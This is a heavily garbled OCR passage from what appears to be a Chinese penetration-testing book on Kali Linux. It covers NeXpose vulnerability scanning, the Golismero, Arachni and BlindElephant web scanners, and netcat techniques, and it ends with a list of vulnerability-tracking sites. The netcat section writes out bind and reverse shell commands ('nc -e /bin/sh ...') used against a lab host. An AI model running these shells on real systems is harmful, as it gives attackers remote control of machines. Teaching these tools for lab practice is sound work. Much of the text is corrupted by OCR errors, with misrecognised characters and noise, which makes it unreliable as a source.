onfirm ections <P Access to external networks was detected. 
Installation progress 9€ Port 5432 is in use. 
:Initialization <P Port 3780 is available. 
Installation success 


* System check 





RAPIDY? 
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5. 根据 屏幕 上 的 提示 进行 操作 ， 逐 步 完 成 安装 过 程 。 请 妥善 保管 
在 配置 过 程 中 设 定 的 用 户 名 和 密码 。 如 果 您 筷 记 了 用 户 名 或 密码 ， 束 要 
重新 安装 NeXpose 程 序 。 

2. 启动 NeXpose 

安装 完毕 之 后 ， 您 就 可 以 进入 程序 所 在 目录 启动 ee /Ts 
默认 的 安装 目录 是 /opt/rapid7/mexpose。 相 对 应 地 ， 您 应 当 通 过 下 述 指令 
进入 程序 启动 脚本 所 在 的 目录 。 

# cd /opt/rapid7/nexpose/nsc 

然后 通过 下 述 脚 本 程序 局 动 NeXpose。 





# ./nsc.sh 

由 于 NeXpose 需要 在 局 动 过 程 中 初始 化 漏洞 信息 数据 库 ， 所 以 程序 
的 局 动 过 程 可 能 要 花费 数 分 钟 的 时 间 。 符 程序 启动 完毕 ， 您 束 可 以 通过 
浏览 器 登录 到 NeXpose 的 安全 控制 台 

如 果 把 NeXpose 程 序 安 装 为 守护 进程 (daemon) ， 那 么 局 动 系统 的 
时 候 它 都 会 自动 启动: 男 外 ， 用 户 的 注销 操作 也 不 会 终止 守护 进程 。 把 

它 安装 为 守护 进程 的 具体 步骤 如 下 。 

1. 使 用 下 述 指令 进入 文件 nexposeconsole.rc 的 所 在 日 录 。 

# cd [installation directory |/nsc 

2. 打开 这 个 文件 ， 并 确定 NXP_ROOT 变 量 已 经 设置 为 NeXpose 的 
安装 目录 。 

3. 把 文件 nexposeconsole.rc 复 制 到 目录 /etc/init.d， 并 将 它 重 命名 。 
本 例 通过 下 述 指 令 把 它 重 命名 为 nexpose。 

# cp [installation directory |/nsc/nexposeconsole.rc /etc/init.d/nexpose 

4. 通过 下 述 指令 设置 启动 脚本 的 文件 权限 。 

# chmod +x /etc/init.d/nexpose 

5. 并 让 守护 进程 伴随 系统 局 动 。 

# update-rc.d nexpose defaults 


6. 可 以 通过 下 述 指令 控制 NeXpose 守 护 进 程 的 启动 、 终 止 和 重 


# dpa iud <start|stop|restart> 
.登录 NeXpose 
M ee te ALTE LA P RE 
步 又。 
1. 打开 浏览 器 并 访问 https://127.0.0.1:3780。 如 果 没 有 出 现 意 外 错 
误 ， 您 就 会 看 到 程序 的 登录 界面 。 首 次 打开 这 个 页 面 时 ， oe je 
示 Untrusted Connection 信息 。 您 需要 验证 证 书 并 把 这 个 这 个 网 站 和 证 


书 设置 为 永久 例外 的 规则 。 此 后， 您 就 再 也 不 会 看 到 这 个 警告 信息 了 。 
2. 在 首次 访问 控制 台 的 时 候 ， 控 制 台 将 会 进行 初始 设置 。 它 会 从 
Rapid7 的 服务 右上 下 载 更 新 安装 包 。 更 新 程序 的 过 程 耗 时 较 长 。 
3. 待 程序 完成 初始 化 设置 ， 您 就 可 以 使 用 在 安装 过 程 中 设置 好 的 
用 户 名 和 和 密码 登录 。 如 图 A.5 ”所 示 ， 在 输入 用 户 名 和 密码 之 后 点 击 Log 
on 按钮 。 
@ | @ https://127.0.0.1 t - €) B~ al Z 


Bnexpose 








Log on 


Username 
admin 


Password 








图 A.5 
4. 控制 台 将 会 提示 您 输入 激活 信息 。 如 网 A.6 所 示 ， 在 窗口 的 文本 
框 内 输入 产品 许可 证 密 钥 之 后 ， 点 击 Activate with key 以 完成 激活 。 


Activate License 


Y) You need an active license for scanning and reporting. To activate 


automatically over the Internet, use a product key. If you do not have a key 


atte í 
= . 


Enter a product key: | Activate with key 





图 A.6 

初次 登录 到 控制 台 的 时 候 ， 您 会 看 到 NeXpos 的 新 闻 页 面 。 这 个 页 
面 详 细 列 出 了 NeXpose 系 统 安装 了 的 更 新 信息 和 功能 改进 纪录 。 如 果 看 
得 到 这 个 页 面 ， 束 说 明 您 所 用 的 Kali Linux 系 统 已 经 成 功 地 安装 了 
NeXpose 共 享 版 程序 。 

KaliLinux 自 带 的 Iceweasel 浏 览 器 可 能 无 法 登录 到 NeXpose 的 安全 控 
制 台 。 如 果 发 生 这 种 情况 ， 您 就 要 安装 Firefox 浏览 器 。 具 体 安 闭 方 法 
请 参见 http://kali4hackers.blogspot.com/2013/05/installfirefox-on-kali- 
linux.html. 

4. 使 用 NeXpose 

本 文 将 使 用 NeXpose 对 局 域 网 进行 一 次 简单 的 扫描 。 具 体 方 法 如 
Ts 

1. ”如 图 A.7 所 示 ， 在 NeXpose 的 控制 面板 中 点 击 Home， 然 后 点 击 
New static site in Site Listing 以 扫描 指定 网 站 。 








«€ à 127.0.0.1 


X nexpose ft assets Vulnerabilities Policies Reports Administration 
Home 


Site Listing 


===} 


Current Scan Listing for All Sites 


There are no sites to display. 


There are no scans to display 


Scan now 





图 A.7 
2. 此 后 ， 依 照 屏幕 上 的 向 导 对 网 站 的 配置 进行 设置 。 此 后 ， 在 菜单 
中 依次 选中 Site configuration | General。 然 后 在 这 个 选项 卡 中 设置 网 站 


名 称 、 任 务 重 要 程度 和 任务 描述 。 接 下 来 点 击 Next 按 钮 ， 在 下 一 个 选项 
卡 中 进行 设置 。 

3. 在 Assets 选项 卡 中 ， 指 定 扫描 目标 的 IP 地 址 。 共 享 版 CE) 的 
NeXpose 最 多 可 扫描 32 个 IP， 这 个 数字 也 是 目标 主机 数量 的 上 限 。 然 后 
点 击 Next 按 钮 ， 进 入 下 一 个 选项 卡 。 本 例 中 ， 我 们 将 使 用 NeXpose 扫描 
运行 Metasploitable 2 的 主机 ， 即 扫描 192.168.56.102。 具 体 设 置 如 图 A.8 
所 示 。 





«€ à 127.0.0.1 v¢ | 图 ~ 省 
Previous Next Save Cancel 
General 
Included Assets 
Assets 


The listed IP addresses and host names are included in this site 


Scan Setup 
Credentials 192.168.56.102 
Web Applications 

Organization 


Import list from file Browse... | No file selected 


Excluded Assets 





The listed IP addresses and host names will not be scanned as part of this site 








图 A.8 
4. 然后 您 需要 在 Scan Setup 中 进行 配置 。 此 处 ， 我 们 选用 Full audit 
的 全 面 扫描 模板 其 他 的 设置 瓯 采取 程序 的 默认 设置 。 然 后 点 击 Next 按 
钮 ， 进 入 下 一 个 选项 卡 。 
5， 设 置 好 选项 之 后 ， 要 点 击 Save 按钮 ， 保 存 各 项 配置 设 定 。 此 





后 ， 刚 才 保 存 的 扫描 任务 就 会 出 现在 程序 的 Site Listing 中 。 点 击 scan 图 
标 即 可 手动 启动 扫描 任务 。 

6. 启动 任务 之 后 ， 界 面 将 会 显示 Start New Scan 窗口 。 验 证 信息 的 
正确 性 之 后 ， 点 击 Start Now 按钮 运行 扫描 任务 。 

7. 如 图 A.9 所 示 ， 当 NeXpose 完成 扫描 任务 之 后 ， 它 的 控制 台 会 显 
AN TAF aR . 








和 | à nttps//127.00.1 3780/scan ntn i3 v €| [B c aj $2 
g nexpose fb Assets Vulnerabilities Policies Reports Administration = 
Commevty 
Full audit o9 F 
Scan Progress 
Scan Type Started Assets Vulnerabilities Elapsed Status 
Manual Wed 23 Oct 2013 09:25:07 AM WIT 1 288 11 minutes Completed successfuly 
Discovered Assets 
Address Name Operating System Vulnerabilities Ñ$ Scan Duration 
Ubuntu Linux 8.04 288 | 10 minutes 








图 A.9 





8. 图 A.10 就 是 程序 目标 主机 的 漏洞 报告 。 


和 和 | à https//127.0.0.1.3780/site 








Vulnerabilities by Severity vx Vulnerabilities over Time 


Moderate 
@ Severe 
e coc 


Vulnerabilities 


Assets by Vulnerability Severity vx Risk Over Time 


100,000 


75,000 





: 图 A.10 

9. 如 需 查 看 详细 的 审计 报告 ， 可 以 在 顶级 菜单 里 点 击 Reports, Jf 
运行 Report Generator 〈 报 告 生成 工具 ) 。 此 次 任务 的 审计 报告 如 图 A.11 
所 示 。 





1. Executive Summary 
This report represents a security audit performed by Nexpose from Rapid7 LLC. It contains confidential information about the state of 
your network. Access to this information by unauthorized personnel may allow them to compromise your network 


Site Name Start Time End Time Total Time Status 
metas ploitable October 08, 2013 11:38, October 08, 2013 11:52, 14 minutes Success 
ICT ICT 


There is not enough historical data to display risk trend. 


The audit was performed on one system which was found to be active and was scanned. 


Vulnerabilities by Severity 


EBI 


B 


e 
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There were 286 vulrerabilties found during this scan. Of these, 69 were crtical vulnerabilties. Critical vulnerabilities require immediate 
图 A.11 
以 上 就 是 NeXpose 共享 版 程序 的 简要 介绍 。 下 一 个 小 节 将 介绍 几 舱 

Web 应 用 程序 的 测试 工具 。 

A.3 Web 应 用 程序 测试 工具 

A.3.1 Golismero 

Golismerozé —3X JT E HJ Web) FH FE GEAR, "C BIPythonis zi f 
写 。Golismero 的 主要 特征 如 下 所 示 。 

e 它 能 收集 、 整 理 多 球 著 名 测试 程序 (例如 sqlmap、xsser、 
openvas、dnsrecon 和 theharvester) 的 扫描 结果 。 

e 它 整合 了 CWE、CVE 和 OWASP 的 数据 库 。 

Kali Linux 安 装 的 Golismero 版 本 过 老 ， 不 能 进行 Web 应 用 程序 的 相 
关 测 试 。 要 安装 最 新 版 本 的 Golismero 程 序 ， 请 通过 
https://github.com/golismero/golismero/archive/master.Zip F £X. 
然后 将 之 解压 缩 。 接 下 来 ， 可 通过 下 述 指令 查看 Golismero 的 帮助 


aw 
信息 。 





o 


python golismero.py -h 


程序 显示 的 帮助 信息 如 图 A.12 所 示 。 


root@kali:~/golismero-master# python golismero.py -h 

usage: golismero.py [-h] [-f FILE] [--config FILE] [-p NAME] [--ui-mode MODE] [-v] [-q] 
[--color] [--no-color] [--audit-name NAME] [-db DATABASE] [-nd] 

[-i FILENAME] [-ni] [-o FILENAME] [-no] [--full] [--brief] 
[--max-connections MAX CONNECTIONS] [--allow-subdomains] 
[--forbid-subdomains] [-r DEPTH] [-1 MAX LINKS] [--follow-redirects] 
[--no-follow-redirects] [--follow-first] [--no-follow-first] [-pu USER] 
[-pp PASS] [-pa ADDRESS:PORT] [--cookie COOKIE] [--cookie-file FILE] 
[--persistent-cache] [--volatile-cache] [-a PLUGIN:KEY-VALUE] [-e PLUGIN] 
[-d PLUGIN] [--max-concurrent N] [--plugins-folder PATH] 

COMMAND [TARGET [TARGET ...]] 





available commands: 


SCAN: 
Perform a vulnerability scan on the given targets. Optionally import 
results from other tools and write a report. The arguments that follow may 
be domain names, IP addresses or web pages. 





PROFILES: 

Show a list of available config profiles. This command takes no arguments. 
PLUGINS: 

Show a list of available plugins. This command takes no arguments. 





图 A.12 
扫描 某 个 网 站 的 指令 如 下 所 示 。 
python golismero.py 192.168.1.138 -o 192-168-1-138.html 
扫描 结果 如 图 A.13 所 示 。 





root@kali:~/golismero-master# python golismero.py 192.168.1.138 -0 192-168-1-138.html 


| GoLismero 2.0.0b2 - The Web Knife 
| Contact: golismero.project<@>gmail .com 


| 
| Daniel Garcia Garcia a.k.a crohn (@ggdaniel) 
| Mario Vilas (@Mario_Vilas) 


GoLismero started at 2013-10-08 11:36:35.219935 

[*] GoLismero: Audit name: golismero-JCioyOLB 

[*] GoLismero: Audit database: golismero-JCioyOLB.db 

[*] GoLismero: Added 2 new targets to the database. 

[*] GoLismero: Launching tests... 

[*] Freegeoip.net connector: Started. 

] Freegeoip.net connector: Finished. 

] 0S fingerprinting plugin: Started. 

] 0S fingerprinting plugin: Finished. 

] Robots.txt Analyzer: Started. 

] Suspicious URL: Started. 

] Suspicious URL: Finished. 

] Web Server fingerprinting plugin: Started. 

] 0S fingerprinting plugin: Started. 

] Web Spider: Started. 

] Web Spider: Spidering URL: 'http://192.168.1.138/' 

] Robots.txt Analyzer: Finished. 

] Web Spider: No links found in URL: http://192.168.1.138/ 
] Web Server fingerprinting plugin: 11.11% percent done... 
Web Spider: Finished. 








图 A.13 
它 生 成 的 扫 拉 报告 如 图 A.14 所 示 。 
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A.3.2 Arachni 


Arachni Chttp://www.arachni-scanner.com/) 是 一 款 由 Ruby 语 言 编写 





的 扫描 Web 应 用 程序 的 工具 。 它 采取 模块 化 设计 ， 性 能 卓越 。 

Arachni 的 功能 十 分 强大 (http://www.arachni-scanner.com/about/ 
features) , “CHEM: 

e 文 持 SSL; 

e 在 审计 的 过 程 当中 检测 到 注销 状态 并 能 重新 登录 ; 

e 高 速 处 理 HTTP 请 求 ; 

e 进行 并 发 扫描 ; 

e 充分 利用 有 限 带 宽 精确 识别 被 测 目 标的 软件 平台 ; 

e 排查 各 种 漏洞 ， 可 检测 SQL 注入 漏洞 、CSRF、 代 码 注入 、LDAP 
注入 、 路 径 过 历 、 文 件 包含 和 XSS 问 题 。 

美中不足 的 是 ，Arachni 也 有 很 多 局 限 Chttp://www.arachni-scan 
ner.com/about/limitations/) : 

e 它 不 支持 DOM、JavaScript、AJAX 和 HTML5; 

e 它 的 报告 可 能 有 假 阳 性 的 误 报 。 

Kali Linux 默认 安装 的 是 0.4.4 版 的 Arachni 程序 。 

下 述 指令 将 显示 帮助 信息 ， 并 列 出 Arachni 文 持 的 各 种 指令 。 

arachni -h 

列举 所 有 模块 的 指令 如 下 所 示 。 

arachni --lsmod 

上 述 指令 的 运行 结果 如 图 A.15 所 示 。 





[~=] Available modules: 


[*] x forwarded for access restriction bypass: 

Name: X-Forwarded-For Access Restriction Bypass 

Description: Retries denied requests with a X-Forwarded-For header 

to trick the web application into thinking that the request originates 
from localhost and checks whether the restrictions was bypassed. 


Elements: server 
Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail .com> 
Version: 0.1 
Targets: 
[~] Generic 
Path: /usr/share/arachni /system/gems/gems/arachni-0.4.4/modules/recon/x forwarded for access restriction bypass.rb 


[*] htaccess limit: 


Name: .htaccess LIMIT misconfiguration 








Description: Checks for misconfiguration in LIMIT directives that blocks 
GET requests but allows POST. 

Elements: server 

Author: Tasos "Zapotek" Laskos «tasos.laskosegmail.com» 

Version: 0.1.5 


图 A.15 

出 于 演示 的 需要 ， 我 们 使 用 Arachni 扫描 一 个 叫 作 DVWA € 
http://www. dvwa.co.uk/) 的 Web 应 用 程序 ， 并 把 扫描 报告 保存 为 HTML 
文件 。 假 如 运行 DVWA 程 序 的 主机 使 用 的 卫 是 192.168.2.22， 那 么 我 们 
需要 使 用 的 指令 如 下 所 示 。 

arachni http://192.168.2.22/dvwa/ --report-html: 

outfile=./192-168-2-22-dvwa.html 

扫描 报告 将 会 保存 在 目录 /usr/share/arachni/bin/ 中 。 使 用 浏览 器 打开 
这 个 报告 文件 ， 将 会 看 到 如 图 A.16 所 示 的 信息 。 
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图 A.16 
A.3.3 BlindElephant 
BlindElephant 是 一 蒜 可 对 Web 应 用 程序 进行 指纹 对 比 的 识别 程序 。 
这 蒜 工 具 通 过 扫描 茶 些 固定 位 置 的 静态 文件 ， 把 这 些 文件 的 哈 希 值 与 各 
版 本 Web 应 用 程序 的 那些 文件 的 哈 希 值 进行 比 对 ， 从 而 鉴定 被 测 Web 应 
用 程序 的 版 本 信息 。 
这 种 识别 技术 的 鉴定 速度 快 ， 融 宽 消耗 低 ， 无 危害 ， 通 用 性 高 且 高 
度 目 动 化 。 
如 需 显 示 BlindElephant 的 帮助 文件 ， 可 使 用 以 下 指令 。 
BlindElephant.py -h 
上 述 指令 将 会 在 屏幕 上 显示 出 程序 的 帮助 信息 。 
如 需 了 解 BlindElephant 支 持 的 Web 应 用 程序 ， 或 者 需要 列 出 它 所 支 
持 的 插件 ， 可 使 用 下 述 指令 。 
nm 一 | 
令 的 运行 结 末 如 下 〈 见 图 A.17) 。 





root@kali:-# BlindElephant.py -l 

urrently configured web apps: 15 

onfluence with O plugins 

drupal with 16 plugins 
admin menu 
cck 

- date 

filefield 
google analytics 
imageapi 
imagecache 
imagefield 
imce 
imce swfupload 
pathauto 
print 
spamicide 
tagadelic 
token 

- views 

oomla with O plugins 


oscommerce with 6 plugins 
phpbb with O plugins 


图 A.17 
如 和 欲 鉴 定 目标 网 站 使 用 的 哪个 版 本 的 WordPress 程 序 ， 可 使 用 下 述 





BlindElephant.py target wordpress 
上 述 指令 的 输出 结果 如 下 。 


Hit http://target/readme.html 

Possible versions based on result: 3.1.3, 3.1.3-IIS 

Hit http://target/wp-includes/js/tinymce/tiny mce.js 

Possible versions based on result: 3.1.1, 3.1.1-IIS, 3.1.1-RC1, 
3.1.1-RC1-IIS, 3.1.2, 3.1.2-IIS, 3.1.3, 3.1.3-IIS, 3.1.4, 3.1.4-IIS 


Possible versions based on result: 3.1, 3.1.1, 3.1.1-IIS, 3.1.1-RC1, 

3.1.1-RC1-IIS, 3.1.2, 3.1.2-IIS, 3.1.3, 3.1.3-IIS, 3.1.4, 3.1.4-IIS, 

3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-IIS, 3.1-RC1, 

3.1-RC2, 3.1-RC2-IIS, 3.1-RC3, 3.1-RC3-IIS, 3.1-RC4, 3.1-RC4-IIS 

Fingerprinting resulted in: 

3.1.3 

3.1.3-IIS 

Best Guess: 3.1.3 

BlindElephant 对 被 测 的 WordPress 程序 的 鉴定 结果 是 3.1.3 版 程序 。 
依据 版 本 信息 ， 我 们 可 找到 相应 版 本 存在 的 安全 漏洞 。 

A.4 网 络 工具 

本 节 将 要 介绍 一 球 多 用 途 的 网 络 工具 。 有 些 人 把 它 叫做 TCP/IP 协 议 
的 瑞士 军刀 ， 它 的 名 字 就 是 NetCat (http://netcat.sourceforge.net/) . 

A.4.1 netcat 

netcat 是 一 球 借 助 TCP 连 接 或 UDP 协 议 读 写 数据 的 工具 。 默 认 情 况 
下 ， 它 使 用 TCP 协 议 传递 数据 。 无 论 是 人 工 输入 的 指令 ， 还 是 其 他 的 程 
序 和 脚本 ， 都 可 以 调用 这 款 工 具 传输 数据 。 第 11 章 介绍 的 ncat 程 序 是 
netcat 的 改进 版 本 。 您 应 当 注 意 的 是 ，netcat 不 会 对 传输 的 数据 进行 加 
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渗透 测试 人 员 多 数 都 了 解 netcat 各 种 不 同 的 用 法 。 这 区 工 具 小 巧 ， 
可 移植 性 高 ， 功 能 强大 ， 可 以 在 被 测 主机 上 单独 运行 。 下 面 将 针对 渗透 


测试 工作 的 需要 演示 Netcat 程序 的 使 用 技巧 。 后 文 的 网 络 配置 情况 如 
Te 

e SSH Web 服务 器 的 卫 地 址 是 192.168.2.22; 

e 客户 端的 JP 地 址 是 192.168.2.23。 

1. AT ITIER 

netcat 可 以 蔡 代 telnet 的 客户 端 程序 ， 直 接连 接 到 指定 IP 地 址 的 任意 
端口 。 这 是 它 的 最 简单 的 用 法 。 

例如 ， 可 使 用 下 述 指令 连接 到 192.168.2.22 的 22 端 口 (SSH 服 务 )。 

# nc 192.168.2.22 22 

远程 服务 器 的 回复 信息 如 下 。 

SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 

然后 ， 我 们 使 用 组 合 键 Ctrl+C 关 闭 连接 。 

2. 提取 服务 标题 

您 可 以 通过 前 一 个 例子 里 用 到 的 技术 提取 多 数 网 络 服务 的 服务 标题 

(service banner) 。 不 仅 SSH 服 务 有 标志 性 的 标题 ， 其 他 的 网 络 服务 多 

数 都 有 相应 的 服务 标题 。 如 果 茶 个 器 口 运 行 痢 HTTP 服 务 ， 那 么 您 需要 
使 用 HTTP 指 令 提取 标题 信息 。 

例如 ， 我 们 可 使 用 下 述 指令 提取 Web 服 务 软件 的 版 本 信息 和 操作 系 
统 信 息 。 

# echo -e "HEAD / HTTP/1.0\n\n" | nc 192.168.2.22 80 

得 到 服务 器 啊 应 如 下 。 

HTTP/1.1 200 OK 

Date: Tue, 08 Oct 2013 14:09:14 GMT 

Server: Apache/2.2.8 (Ubuntu) DAV/2 

X-Powered-By: PHP/5.2.4-2ubuntu5.10 


Connection: close 








Content-Type: text/html 


上 述 信息 表明 ，Web 服务 的 后 台 程 序 是 Apache， 主 机 的 操作 系统 是 
Ubuntu 5.10。 

3. 简易 聊天 服务 器 

如 果 要 使 用 netcat 程 序 在 1234 端 口上 运行 聊天 服务 器 ， 可 使 用 下 述 


指令 。 





# nc -l -p 1234 

此 后 ， 您 就 可 以 使 用 telnet、netcat 或 者 相似 的 软件 ， 连 接 到 服务 端 
程序 。 

$telnet 192.168.2.22 1234 

随后 所 输入 的 所 有 字符 ， 都 将 显示 在 服务 端的 netcat 程 序 里 。 

这 实际 上 建立 了 一 种 简单 的 双 辐 通信 连接 。 

如 需 关 闭 连 接 ， 可 使 用 组 合 键 Ctrl+C。 

4. 文件 传输 

如 果 要 传递 一 个 名 为 thepass 的 文件 ， 可 在 接收 端 运行 下 述 指令 。 

# nc -l -p 1234 > thepass.out 

RISE RIE MIZAT PIRES S 

# nc -w3 192.168.2.22 1234 < thepass 

从 发 送 剖 将 会 把 文件 thepass 传输 到 接收 端 。 而 后 ， 接 收 站 会 把 文 
件 储存 为 thepass.out。 

我 在 渗透 测试 任务 中 使 用 netcat 传 输 过 文件 。 当 利用 了 被 测 主机 的 
漏洞 并 建立 reverse shell 之 后 ， 用 它 传递 了 文件 。 幸 运 的 是 ， 被 测 主 机 装 
有 netcat 程 序 ， 用 它 传递 文件 并 没有 发 生 问题 。 

5. 端口 扫描 

netcat 还 可 以 胜任 简单 的 问 口 扫描 工作 。 本 例 将 使 用 netcat 程 序 扫 描 
被 测 主机 的 TCP 1 一 1000 端 口 ， 同 时 指定 程序 : 显示 详细 信息 CO 、 
禁止 解 机 DNS 名 称 〈-n) 、 不 发 送 任何 数据 Cz) 、 超 时 设置 为 1 Pb C 
w1) 。 综 合 以 上 要 求 ， 我 们 需要 使 用 的 指令 如 下 所 示 。 





# nc -n -v -z -w 1 192.168.2.22 1-1000 

上 述 指令 的 运行 结果 如 下 。 

(UNKNOWN) [192.168.2.22] 514 (shell) open 

(UNKNOWN) [192.168.2.22] 513 (login) open 

(UNKNOWN) [192.168.2.22] 512 (exec) open 

(UNKNOWN) [192.168.2.22] 445 (microsoft-ds) open 

(UNKNOWN) [192.168.2.22] 139 (netbios-ssn) open 

(UNKNOWN) [192.168.2.22] 111 (sunrpc) open 

(UNKNOWN) [192.168.2.22] 80 (http) open 

(UNKNOWN) [192.168.2.22] 53 (domain) open 

(UNKNOWN) [192.168.2.22] 25 (smtp) open 

(UNKNOWN) [192.168.2.22] 23 (telnet) open 

(UNKNOWN) [192.168.2.22] 22 (ssh) open 

(UNKNOWN) [192.168.2.22] 21 (ftp) open 

可 见 ， 主 机 192.168.2.22 开 放 了 多 个 端口 (514、513、512、445、 
139. 111. 80. 53. 25. 23. 22. 21) 8 

虽然 netcat 确 实 具 有 病 口 扫描 的 功能 ， 但 是 本 书 建议 您 还 是 使 用 
Nmap 进 行 端口 扫描 。 在 这 方面 ， 毕 竟 Nmap 的 功能 更 为 讲究 。 

6. backdoor shell 

我 们 同样 可 以 使 用 netcat 程 序 实现 一 种 可 获取 shell 的 后 门 。 这 种 情 
况 下 ， 要 指定 程序 的 监 昕 端口 (通过 -p 选 项 设置 ) 和 shell (通过 -e 选 项 
WHO. 

如 果 要 在 1234 号 端口 上 打开 /bin/sh 的 shell， 可 使 用 下 述 指令 。 

# nc -e /bin/sh -l -p 1234 

此 后 ， 我 们 在 客户 端 上 使 用 telnet 或 相似 的 客户 端 程序 连接 到 服务 
端 后 门 。 

telnet 192.168.2.22 1234 








在 telnet 客 户 问 程 序 提 示 相 应 信息 之 后 ， 您 融 可 以 通过 这 个 shell 在 服 
务 端的 Linux 主 机 上 使 用 任意 Linux 指 令 。 

例如 ， 我 们 首先 通过 id 指令 获取 登录 账号 的 相关 资料 ， 可 得 到 如 下 
信息 。 

uid=1000(msfadmin) gid=1000(msfadmin) 

groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(v 
46(plugdev),107(fuse),111(Ipadmin),112(admin),119(sambashare), 1000(msfa 

接 下 来 ， 我 们 通过 下 述 指 令 人 查看 服务 端 当前 目录 的 所 有 文件 。 

Is -al 

上 述 指令 的 运行 结果 如 下 。 

total 9276 

drwxr-xr-x 10 msfadmin msfadmin 4096 2013-09-16 18:40 . 

drwxr-xr-x 6root root 4096 2010-04-16 02:16 .. 

lrwxrwxrwx root root 9 2012-05-14 00:26 .bash 

history -> /dev/null 

drwxr-xr-x 3 msfadmin msfadmin 4096 2013-09-08 03:55 cymothoa 

1-beta 

-rw-r--r-- 1 msfadmin msfadmin 18177 2013-09-08 03:36 cymothoa 

1-beta.tar.gz 

drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc 

-rw-r--r-- 1 msfadmin msfadmin 1669 2013-08-27 10:11 etc-passwd 

-rw-r--r-- 1 msfadmin msfadmin 1255 2013-08-27 10:11 etc-shadow 

drwxr-xr-x 5 msfadmin msfadmin 4096 2013-06-12 01:23 .fluxbox 

drwx------ 2 msfadmin msfadmin 4096 2013-09-14 08:25 .gconf 

drwx------ 2 msfadmin msfadmin 4096 2013-09-14 08:26 .gconfd 

-IW------- l root root 26 2013-09-14 08:57 .nano_his 


-rwxr-xr-x 1 msfadmin msfadmin 474740 2013-09-14 09:38 ncat 

drwxr-xr-x 21 msfadmin msfadmin 4096 2013-09-14 09:31 nmap-6.40 

-rw-r--r-- 1msfadminmsfadmin 586 2010-03-16 19:12 .profile 

ls fa CHIE IT ZR RS Ent E. WR ERS m DA 
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有 服务 端 主机 的 全 部 root 权 限 。 不 过 shell 并 不 是 真正 的 终端 ， 也 残 是 说 
您 无 法 在 shell 上 运行 su 之 类 的 指令 。 

需要 注意 的 是 ，netcat 不 会 进行 加 蜜 连接: 此外， 只 要 发 现 了 后 门 
的 端口 ， 就 可 连接 到 相应 端口 ， 对 服务 端 主机 进行 控制 。 

7. reverse shell 

netcat 的 reverse shell 工作 模式 和 上 一 个 例子 的 连接 模式 恰恰 相反 。 
刚才 的 例子 中 ， 我 们 在 服务 端 开放 了 一 个 端口 ， 并 把 shell 绑 定 到 这 个 站 
1. reverse shell 则 是 让 远程 主机 (shell 的 服务 器 端 〉 连接 到 我 们 所 用 的 
主机 《〈 即 shell 的 客户 端 ) 。 

首先 ， 我 们 在 客户 端 主机 上 运行 下 述 指令 。 

# nc -n -v -l -p 1234 

PRIG ERS wma FRS. 

# nc -e /bin/sh 192.168.2.23 1234 

如 果 客 户 端 主机 提示 以 下 信息 ， 则 说 明 我 们 已 经 连接 到 了 reverse 
shell. 

connect to [192.168.2.23] from (UNKNOWN) [192.168.2.22] 53529 

ila, fü n] DA ERE P? EDL IA IRS ag 3D LA EE RR e 

例如 ， 可 在 客户 端 程序 里 使 用 下 述 指令 碍 看 远程 主机 的 耳 地 址 。 

ip addr show 

上 述 指令 的 运行 结果 如 下 。 

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 

link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 














inet 127.0.0.1/8 scope host lo 
inet6 ::1/128 scope host 
valid lft forever preferred lft forever 
2: eth: xBROADCAST,MULTICAST,UP,LOWER UP» mtu 1500 
qdisc pfifo fast qlen 1000 
link/ether 08:00:27:43:15:18 brd ff:ff:ff:ff:ff:ff 
inet 192.168.2.22/24 brd 192.168.2.255 scope global ethO 
inet6 fe80::a00:27ff:fe43:1518/64 scope link 
valid lft forever preferred lft forever 
在 客户 站 程序 里 ， 可 执行 远程 主机 支持 的 所 有 指令 。 
A.5 AS E/N Si 
本 章 介 绍 了 数 款 可 能 会 在 渗透 测试 的 工作 中 使 用 到 的 工具 。 有 些 软 
件 并 没有 被 Kali Linux 收 录 ， 而 且 Kali 收 录 的 软件 其 版 本 可 能 版 本 不 够 
新 。 不 过 ， 正 如 我 们 看 到 的 那样 ， 更 新 或 安装 软件 的 过 程 并 不 复杂 。 本 
章 介 绍 了 4 类 软件 : 信息 侦察 工具 、 漏 洞 扫描 程序 、Web 应 用 程序 工具 
和 网 络 工具 。 
本 文 介绍 的 工具 都 是 广 受 欢迎 的 、 功 能 强大 且 成 熟 度 很 高 的 程序 。 
本 章 首先 对 这 些 工具 进行 简要 介绍 ， 而 后 演示 了 其 安装 和 配置 方 
法 ， 并 讲解 了 它们 的 各 种 使 用 方法 。 











SSB 关键 资源 


本 章 将 癌 读 者 介绍 各 种 有 助 于 拓展 渗透 测试 知识 的 网 络 资源 。 这 些 
资源 大 致 可 分 为 以 下 几 类 : 

e 发 布 、 姐 路 安全 漏洞 的 网 站 ; 

e 采购 漏洞 和 exploit 的 公司 ; 

e > wile] CRE. exploit 研发 和 渗透 测试 的 网 站 ; 

e 练习 渗透 测试 的 测试 环境 ; 

e 在 渗透 测试 过 程 中 时 常 需要 参照 的 常见 端口 列表 。 

本 文 介绍 的 各 个 网 站 主要 适合 初学 者 学 习 之 用 ， 而 且 有 关内 容 并 不 
是 面面俱到 。 建 议 想 要 深造 的 读者 使 用 搜索 引擎 得 找 适 合 目 己 水 平 的 网 
络 资源 。 

B.1 发 布 、 追 踪 漏 洞 的 网 站 

本 节 列 出 的 线 上 资源 有 助 于 读者 追踪 漏洞 信息 。 许 多 网 站 都 允许 网 
友 发 布 他 们 发 现 的 安全 漏洞 。 您 也 可 以 在 这 些 公 共 、 私 人 组 织 的 网 站 上 
发 布 您 挖掘 出 来 的 漏洞 信息 。 其 中 一 些 网 站 还 会 给 发 布 漏洞 的 安全 人 员 
文 付 报酬 ， 以 报答 发 布 人 员 在 挖掘 漏洞 、 研 发 PoC 代 码 的 时 候 花费 的 时 





























" WHE 
间 和 精力 。 
我 们 整理 了 部 分 发 布 、 追 踪 漏 洞 信息 的 网 站 。 

URL 描述 
http://www.osvdb.org/ 开源 漏洞 数据 库 
http://www.securityfocus.com/ 安全 焦点 提供 公开 漏洞 、 邮 件 列 表 和 安全 工具 
http://www.packetstormsecurity.org/ exploit、 公 告 、 工 具 和 白皮书 
http://www.vupen.com/ 安全 公告 、PoC、 邮 件 列表 和 研究 类 期 刊 
